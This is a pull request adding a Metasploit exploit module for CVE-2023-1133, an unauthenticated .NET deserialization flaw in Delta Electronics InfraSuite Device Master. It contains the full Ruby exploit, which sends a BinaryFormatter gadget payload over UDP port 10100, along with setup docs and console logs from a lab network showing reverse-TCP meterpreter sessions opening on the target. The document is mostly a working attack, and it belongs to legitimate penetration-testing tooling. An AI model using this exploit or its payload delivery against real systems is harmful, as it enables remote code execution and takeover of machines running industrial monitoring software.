### PR TITLE
Add CVE-2023-1133 - .NET Deserialization exploit for Delta Electronics InfraSuite Device Master

### DIFF
--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Delta Electronics InfraSuite Device Master versions below `v1.0.5` are vulnerable to
-an unauthenticated .NET deserialization vulnerability. The `Device-Gateway-Status` process
+an unauthenticated .NET deserialization vulnerability in the `Device-Gateway-Status` process which
 listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled
 data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method,
 resulting in code execution as the user running the `Device-Gateway-Status` process.

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -14,7 +14,7 @@ resulting in code execution as the user running the `Device-Gateway-Status` proc
 4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit
 5. Click `Next`, then `Install`
 6. Click `Finish`, then wait for the processing of files to finish
-7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click finish
+7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click `Finish`
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -12,7 +12,7 @@ resulting in code execution as the user running the `Device-Gateway-Status` proc
 2. Install all of the pre-requisites (Stack Builder is not needed) and reboot
 3. Click `next` and ensure the three features, `Device-Monitor`, `Device-DataCollect`, and `Device-Gateway` are selected to install
 4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit
-5. Click `next`, then `Install`
+5. Click `Next`, then `Install`
 6. Click `Finish`, then wait for the processing of files to finish
 7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click finish
 

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -3,7 +3,7 @@
 Delta Electronics InfraSuite Device Master versions below `v1.0.5` are vulnerable to
 an unauthenticated .NET deserialization vulnerability in the `Device-Gateway-Status` process which
 listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled
-data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method,
+data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method without appropriate validation,
 resulting in code execution as the user running the `Device-Gateway-Status` process.
 
 ### Installation Instructions

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -8,7 +8,7 @@ resulting in code execution as the user running the `Device-Gateway-Status` proc
 
 ### Installation Instructions
 
-1. Unzip and run the installer
+1. Unzip and run the installer from https://archive.org/details/infra-suite-device-master-00.00.01ax-64
 2. Install all of the pre-requisites (Stack Builder is not needed) and reboot
 3. Click `next` and ensure the three features, `Device-Monitor`, `Device-DataCollect`, and `Device-Gateway` are selected to install
 4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -8,6 +8,14 @@ resulting in code execution as the user running the `Device-Gateway-Status` proc
 
 ### Installation Instructions
 
+1. Unzip and run the installer
+2. Install all of the pre-requisites (Stack Builder is not needed) and reboot
+3. Click `next` and ensure the three features, `Device-Monitor`, `Device-DataCollect`, and `Device-Gateway` are selected to install
+4. The password on the next screen should say `Ems3000!`, but it is not needed for the exploit
+5. Click `next`, then `Install`
+6. Click `Finish`, then wait for the processing of files to finish
+7. Once the previous step is done, ensure `Yes, I want to restart my computer now` is checked and click finish
+
 ## Verification Steps
 
 1. Install the application

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -38,6 +38,62 @@ only used to check the version of the software to determine exploitability. 80 b
 ### InfraSuite Device Master v01.00.00d on Windows 10 x64
 
 ```
+msf6 > use exploit/windows/misc/delta_electronics_infrasuite_deserialization
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set rhost 192.168.140.187
+rhost => 192.168.140.187
+msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > options
+
+Module options (exploit/windows/misc/delta_electronics_infrasuite_deserialization):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   INFRASUITE_PORT  80               yes       The port on which the InfraSuite Manager is listening
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port]
+                                               [...]
+   RHOSTS           192.168.140.187  yes       The target host(s), see https://docs.metasploit.com/doc
+                                               s/using-metasploit/basics/using-metasploit.html
+   RPORT            10100            yes       The target port (UDP)
+   SSL              false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                           no        Path to a custom SSL certificate (default is randomly g
+                                               enerated)
+   TARGETURI        /                yes       The base path to the InfraSuite Manager
+   URIPATH                           no        The URI to use for this exploit (default is random)
+   VHOST                             no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be
+                                       an address on the local machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.140.1    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows EXE Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+
 msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run
 
 [*] Started reverse TCP handler on 192.168.140.1:4444

--- a/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
+++ b/documentation/modules/exploit/windows/misc/delta_electronics_infrasuite_deserialization.md
@@ -1,0 +1,59 @@
+## Vulnerable Application
+
+Delta Electronics InfraSuite Device Master versions below `v1.0.5` are vulnerable to
+an unauthenticated .NET deserialization vulnerability. The `Device-Gateway-Status` process
+listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled
+data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method,
+resulting in code execution as the user running the `Device-Gateway-Status` process.
+
+### Installation Instructions
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/delta_electronics_infrasuite_deserialization`
+4. Do: `set RHOST <IP>`
+5. Do: `set INFRASUITE_PORT <PORT_NO>`
+6. Do: `run`
+7. You should get a meterpreter session.
+
+## Options
+
+### INFRASUITE_PORT
+
+This is the option on which the web-based InfraSuite Device Manager listens. It is
+only used to check the version of the software to determine exploitability. 80 by default
+
+## Scenarios
+
+### InfraSuite Device Master v01.00.00d on Windows 10 x64
+
+```
+msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Requesting the login page to determine if target is Infrasuite Device Master...
+[*] Target is InfraSuite Device Master. Now attempting to determine version.
+[+] The target appears to be vulnerable.
+[*] Using URL: http://192.168.140.1:8080/xkRhewOXntAgYs
+[*] Command Stager progress - 100.00% done (153/153 bytes)
+[*] Client 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673) requested /xkRhewOXntAgYs
+[*] Sending payload to 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673)
+[*] Sending stage (175686 bytes) to 192.168.140.187
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.187:50409) at 2023-06-05 17:09:29 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: DESKTOP-R6RCNHH\space
+meterpreter > sysinfo
+Computer        : DESKTOP-R6RCNHH
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 5
+Meterpreter     : x86/windows
+meterpreter >
+```

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -130,4 +130,8 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
     udp_sock.put(pkt)
   end
+
+  def cleanup
+    disconnect_udp
+  end
 end

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::Udp
   prepend Msf::Exploit::Remote::AutoCheck
@@ -13,8 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => '',
+        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
         'Description' => %q{
+          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
+          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
+          method of the 'Device-Gateway-Status' process.
+
+          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
+          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header,
+          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
         },
         'Author' => [
           'Anonymous', # Vulnerability discovery
@@ -26,13 +34,15 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/']
         ],
         'Platform' => 'win',
+        'Privileged' => false,
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Windows EXE Dropper',
             {
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :windows_dropper,
-              'DefaultOptions' => { 'PrependMigrate' => true }
+              'CmdStagerFlavor' => :psh_invokewebrequest
             }
           ],
           [
@@ -49,8 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
-        },
-        'Privileged' => true
+        }
       )
     )
 
@@ -62,8 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # js/webcfg.js - contains some version information
-    print_status('Requesting the login page to determine if target is Infrasuite Device Master...')
+    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
     res = send_request_cgi(
       'method' => 'GET',
       'rport' => datastore['INFRASUITE_PORT'],
@@ -103,8 +111,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect_udp
+    case target['Type']
+    when :windows_dropper
+      execute_cmdstager
+    when :windows_cmd
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
     serialized = ::Msf::Util::DotNetDeserialization.generate(
-      payload.encoded,
+      cmd,
       gadget_chain: :ClaimsPrincipal,
       formatter: :BinaryFormatter
     )

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
     end
 
-    version = res.body.match(/version:'(\d+(\.\d+)+[a-zA-Z]?)'/)
+    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
     unless version && version.length > 1
       return CheckCode::Detected('Failed to find version string')
     end

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2023-1133'],
-          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/']
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
+          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
         ],
         'Platform' => 'win',
         'Privileged' => false,
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-05-17',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
           method of the 'Device-Gateway-Status' process.
 
           The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
-          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header,
+          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
           leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
         },
         'Author' => [

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -5,7 +5,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::Udp
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -54,11 +54,51 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-    register_options([ Opt::RPORT(10100) ])
+    register_options([
+      Opt::RPORT(10100),
+      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
+      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
+    ])
   end
 
   def check
-    CheckCode::Vulnerable
+    # js/webcfg.js - contains some version information
+    print_status('Requesting the login page to determine if target is Infrasuite Device Master...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'rport' => datastore['INFRASUITE_PORT'],
+      'uri' => normalize_uri(target_uri.path, 'login.html')
+    )
+
+    return CheckCode::Unknown unless res
+
+    unless res.body.include?('InfraSuite Manager Login')
+      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
+    end
+
+    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'rport' => datastore['INFRASUITE_PORT'],
+      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
+    )
+
+    unless res&.body&.include?('var devicemasterCfg')
+      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
+    end
+
+    version = res.body.match(/version:'(\d+(\.\d+)+[a-zA-Z]?)'/)
+    unless version && version.length > 1
+      return CheckCode::Detected('Failed to find version string')
+    end
+
+    version = version[1]
+    vprint_status("Found version '#{version}' of InfraSuite Device Master")
+    r_vers = Rex::Version.new(version)
+
+    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')
+
+    CheckCode::Safe
   end
 
   def exploit

--- a/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
+++ b/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
@@ -1,0 +1,75 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::Udp
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '',
+        'Description' => %q{
+        },
+        'Author' => [
+          'Anonymous', # Vulnerability discovery
+          'Shelby Pace' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-1133'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'PrependMigrate' => true }
+            }
+          ],
+          [
+            'Windows CMD',
+            {
+              'Arch' => [ARCH_CMD],
+              'Type' => :windows_cmd
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([ Opt::RPORT(10100) ])
+  end
+
+  def check
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    connect_udp
+    serialized = ::Msf::Util::DotNetDeserialization.generate(
+      payload.encoded,
+      gadget_chain: :ClaimsPrincipal,
+      formatter: :BinaryFormatter
+    )
+
+    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
+    udp_sock.put(pkt)
+  end
+end


### PR DESCRIPTION
This adds an exploit module for an unauthenticated .NET deserialization vulnerability in Delta Electronics InfraSuite Device Master versions below `1.0.5`.

The `Device-Gateway-Status` process listens on port `10100` and communicates over UDP. Its `ParseUDPPacket()` method reads user-controlled data and passes what it determines to be the packet header to the `BinaryFormatter.Deserialize()` method, resulting in code execution as the user running the `Device-Gateway-Status` process.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/windows/misc/delta_electronics_infrasuite_deserialization`
- [ ] Do: `set RHOST <IP>`
- [ ] Do: `set INFRASUITE_PORT <PORT_NO>`
- [ ] Do: `run`
- [ ] You should get a meterpreter session.

## Scenarios

```
msf6 > use exploit/windows/misc/delta_electronics_infrasuite_deserialization
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set rhost 192.168.140.187
rhost => 192.168.140.187
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting the login page to determine if target is InfraSuite Device Master...
[*] Target is InfraSuite Device Master. Now attempting to determine version.
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/6Qf1iwdWyWN082
[*] Command Stager progress - 100.00% done (153/153 bytes)
[*] Client 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673) requested /6Qf1iwdWyWN082
[*] Sending payload to 192.168.140.187 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.2673)
[*] Sending stage (175686 bytes) to 192.168.140.187
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.187:49820) at 2023-06-06 14:32:18 -0500
[*] Server stopped.

meterpreter > getuid
Server username: DESKTOP-R6RCNHH\space
meterpreter > sysinfo
Computer        : DESKTOP-R6RCNHH
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.187 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set target 1
target => 1
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > set payload cmd/windows/powershell/meterpreter/reverse_tcp
payload => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/delta_electronics_infrasuite_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Requesting the login page to determine if target is InfraSuite Device Master...
[*] Target is InfraSuite Device Master. Now attempting to determine version.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.140.187
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.187:49821) at 2023-06-06 14:33:05 -0500

meterpreter > getuid
Server username: DESKTOP-R6RCNHH\space
meterpreter > sysinfo
Computer        : DESKTOP-R6RCNHH
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter >
```